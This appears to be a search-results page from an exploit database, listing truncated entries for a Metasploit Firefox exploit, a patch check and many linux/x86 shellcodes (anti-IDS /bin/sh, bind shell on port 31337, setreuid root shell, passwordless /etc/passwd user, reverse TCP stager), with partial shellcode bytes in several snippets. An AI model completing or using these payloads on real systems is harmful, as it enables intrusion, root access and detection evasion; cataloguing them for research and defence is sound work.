10226 matches found
Mozilla Firefox 1.5 (Linux) - location.QueryInterface() Code Execution (Metasploit)
Mozilla Firefox 1.5 Linux - location.QueryInterface Code Execution Metasploit This file is part of the Metasploit Framework and may be redistributed according to the licenses defined in the Authors field below. In the case of an unknown or missing license, this file defaults to the same license a...
Solaris 10 (x86) : 121005-04
SunOS 5.10x86: sh patch. Date this patch was last updated by Sun : May/23/08 %NASLMINLEVEL 70300 @DEPRECATED@ This script has been deprecated as the associated patch is not currently a recommended security fix. Disabled on 2011/09/17. C Tenable Network Security, Inc. if ! definedfunc"bnrandom"...
linux/x86 execve /bin/sh anti-ids 40 bytes
No description provided by source. / N Shell : shellcodez Arch:x86 Platform:linux Size:40 Description: The shellcode to execute /bin/sh; This shellcode is anti-ids It not containz encoding engine but it not contain standart signatures as: "\xcd\x80" '\bin\sh' Tested on Slackware 10.0 Coded by...
linux/x86 -execve /bin/sh anti-ids 40 bytes
linux/x86 execve /bin/sh anti-ids 40 bytes. Shellcode exploit for linx86 platform / N Shell : shellcodez Arch:x86 Platform:linux Size:40 Description: The shellcode to execute /bin/sh; This shellcode is anti-ids It not containz encoding engine but it not contain standart signatures as: "\xcd\x80"...
linux/x86 execve /bin/sh anti-ids 40 bytes
Exploit for linux/x86 platform in category shellcode ========================================== linux/x86 execve /bin/sh anti-ids 40 bytes ========================================== / N Shell : shellcodez Arch:x86 Platform:linux Size:40 Description: The shellcode to execute /bin/sh; This shellcod...
linux/x86 - execve /bin/sh encoded by +1 39 bytes
linux/x86 execve /bin/sh encoded by +1 39 bytes. Shellcode exploit for linx86 platform / linux/x86 - execve"/bin/sh", "/bin/sh", NULL / encoded by +1 - 39 bytes - izik / char shellcode = "\x68\x8a\xe2\xce\x81" // push $0x81cee28a "\x68\xb1\x0c\x53\x54" // push $0x54530cb1 "\x68\x6a\x6f\x8a\xe4" /...
linux/x86 execve /bin/sh xored for Intel x86 CPUID 41 bytes
No description provided by source. / linux/x86 execve"/bin/sh", "/bin/sh", NULL / xor'ed against Intel x86 CPUID - 41 bytes The idea behind this shellcode is to use a weak pre-shared secret between the attacker and the attacked machine. So if a 3rd party side would try to run this shellcode and...
linux/x86 execve /bin/sh (encoded by +1) 39 bytes
No description provided by source. / linux/x86 - execve"/bin/sh", "/bin/sh", NULL / encoded by +1 - 39 bytes - izik [email protected] / char shellcode = "\x68\x8a\xe2\xce\x81" // push $0x81cee28a "\x68\xb1\x0c\x53\x54" // push $0x54530cb1 "\x68\x6a\x6f\x8a\xe4" // push $0xe48a6f6a...
linux/x86 - execve /bin/sh xored for Intel x86 CPUID 41 bytes
linux/x86 execve /bin/sh xored for Intel x86 CPUID 41 bytes. Shellcode exploit for linx86 platform / linux/x86 execve"/bin/sh", "/bin/sh", NULL / xor'ed against Intel x86 CPUID - 41 bytes The idea behind this shellcode is to use a weak pre-shared secret between the attacker and the attacked...
linux/x86 execve /bin/sh (encoded by +1) 39 bytes
Exploit for linux/x86 platform in category shellcode ================================================= linux/x86 execve /bin/sh encoded by +1 39 bytes ================================================= / linux/x86 - execve"/bin/sh", "/bin/sh", NULL / encoded by +1 - 39 bytes - izik / char shellcod...
Linux Mettle x86, Reverse TCP Stager
Inject the mettle server payload staged. Connect back to the attacker This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 123 include Msf::Payload::Stager include...
linux/x86 eject cd-rom (follows /dev/cdrom symlink) + exit() 40 bytes
Exploit for linux/x86 platform in category shellcode ===================================================================== linux/x86 eject cd-rom follows /dev/cdrom symlink + exit 40 bytes ===================================================================== / linux/x86 eject cd-rom follows...
linux/x86 eject cd-rom follows /dev/cdrom symlink + exit 40 bytes
linux/x86 eject cd-rom follows /dev/cdrom symlink + exit 40 bytes. Shellcode exploit for linx86 platform / linux/x86 eject cd-rom follows "/dev/cdrom" symlink + exit - 40 bytes - izik / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx...
linux/x86 normal exit with random so to speak return value 5 bytes
linux/x86 normal exit w/ random so to speak return value 5 bytes. Shellcode exploit for linx86 platform / linux/x86 normal exit w/ random so to speak return value - 5 bytes - izik / char shellcode = "\x31\xc0" // xor %eax,%eax "\x40" // inc %eax "\xcd\x80"; // int $0x80 int mainint argc, char arg...
linux/x86 anti-debug trick (INT 3h trap) + execve /bin/sh 39 bytes
Exploit for linux/x86 platform in category shellcode ================================================================== linux/x86 anti-debug trick INT 3h trap + execve /bin/sh 39 bytes ================================================================== / linux/x86 anti-debug trick INT 3h trap +...
linux/x86 Bind /bin/sh to 31337/tcp + fork() 98 bytes
Exploit for linux/x86 platform in category shellcode ===================================================== linux/x86 Bind /bin/sh to 31337/tcp + fork 98 bytes ===================================================== / linux/x86 bind '/bin/sh' to 31337/tcp + fork - 98 bytes - izik / char shellcode =...
linux/x86 setreuid(0, 0) + execve(/bin/sh) 31 bytes
Exploit for linux/x86 platform in category shellcode =================================================== linux/x86 setreuid0, 0 + execve/bin/sh 31 bytes =================================================== / linux/x86 setreuid0, 0 + execve"/bin/sh", "/bin/sh", NULL, NULL - 31 bytes - izik / char...
linux/x86 cat /dev/urandom > /dev/console, just for kicks - 63 bytes
Exploit for linux/x86 platform in category shellcode ==================================================================== linux/x86 cat /dev/urandom /dev/console, just for kicks - 63 bytes ==================================================================== / linux/x86 cat /dev/urandom...
linux/x86 Adduser without Password to /etc/passwd 59 bytes
Exploit for linux/x86 platform in category shellcode ========================================================== linux/x86 Adduser without Password to /etc/passwd 59 bytes ========================================================== / linux/x86 adds user 'xtz' without password to /etc/passwd - 59...
linux/x86 Adduser without Password to /etc/passwd 59 bytes
linux/x86 Adduser without Password to /etc/passwd 59 bytes. Shellcode exploit for linx86 platform / linux/x86 adds user 'xtz' without password to /etc/passwd - 59 bytes - izik / char shellcode = "\x6a\x05" // push $0x5 // // : // "\x58" // pop %eax "\x99" // cltd "\x31\xc9" // xor %ecx,%ecx...